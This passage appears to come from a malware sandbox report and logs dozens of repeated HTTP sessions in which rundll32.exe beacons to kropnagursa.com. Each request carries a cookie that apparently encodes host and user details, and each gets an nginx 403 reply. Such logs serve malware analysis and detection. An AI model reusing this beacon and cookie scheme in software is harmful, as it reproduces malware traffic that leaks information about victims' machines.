                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            156192.168.2.44985245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:34.151499987 CET2307OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:34.316380978 CET2308INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:34 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            157192.168.2.44985345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:34.900005102 CET2308OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:35.064847946 CET2309INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:34 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            158192.168.2.44985445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:35.384267092 CET2310OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:35.548979998 CET2310INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            159192.168.2.44985545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:36.160759926 CET2311OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:36.329720020 CET2311INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:36 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            16192.168.2.44971245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:08.710021973 CET2128OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:08.877590895 CET2128INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:08 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            160192.168.2.44985645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:36.635617971 CET2312OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:36.800306082 CET2313INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:36 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            161192.168.2.44985745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:37.731797934 CET2313OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:37.896616936 CET2314INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:37 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            162192.168.2.44985845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:38.225730896 CET2315OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:38.393383026 CET2315INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            163192.168.2.44985945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:38.742382050 CET2316OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:38.906989098 CET2316INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            164192.168.2.44986045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:39.250921965 CET2317OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:39.424999952 CET2318INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Feb 2, 2023 21:18:39.579072952 CET2318OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:39.753452063 CET2318INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            165192.168.2.44986145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:40.065283060 CET2319OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:40.230130911 CET2320INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:40 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            166192.168.2.44986245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:40.568624020 CET2320OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:40.733697891 CET2321INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:40 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            167192.168.2.44986345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:41.049639940 CET2322OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:41.214329004 CET2322INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            168192.168.2.44986445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:41.533035040 CET2323OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:41.701217890 CET2323INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            169192.168.2.44986545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:42.020539045 CET2324OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:42.188257933 CET2325INHTTP/1.1 403 Forbidden
